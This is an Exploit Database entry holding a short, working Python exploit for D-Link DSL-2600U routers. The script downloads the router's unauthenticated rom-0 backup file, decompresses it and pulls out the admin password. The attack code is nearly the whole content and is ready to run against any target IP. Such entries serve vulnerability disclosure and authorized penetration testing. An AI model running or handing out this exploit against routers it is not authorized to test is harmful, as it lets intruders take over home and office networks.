[hardware] D-Link DSL2600U - 'rom-0' Admin Password Disclosure

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING D-Link DSL2600U - 'rom-0' Admin Password Disclosure EDB-ID: 52576 CVE: N/A EDB Verified: Author: AMIR HOSSEIN JAMSHIDI Type: HARDWARE Exploit:   /   Platform: MULTIPLE Date: 2026-05-26 Vulnerable App: # Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure # Date: 2026-05-02 # Exploit Author: Amir Hossein Jamshidi # Vendor Homepage: https://www.dlink.com # Version: DSL-2600U # Tested on: ubuntu # CVE : N/A # Firmware Version: v1.08 from routersploit.libs.lzs.lzs import LZSDecompress import requests import re import sys print(''' ################################################################################# # D-Link Router - 'rom-0' Admin Password Disclosure # # BY: Amir Hossein Jamshidi # # Mail: amirhosseinjamshidi64@gmail.com # # github: https://github.com/amirhosseinjamshidi64 # # Usage: python expoit.py # ################################################################################# ''') def exploit(url): data = requests.get(f"{url}/rom-0") #with open("data", 'wb') as f: # f.write(data.content) data = data.content pos = 8568 res, win = LZSDecompress(data[pos:]) password = re.findall("([\040-\176]{5,})", res) return password[0] if __name__ == "__main__": url = input("Enter Target IP (example: http://192.168.1.1): ") print("password is: " + '\t' + exploit(url)) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services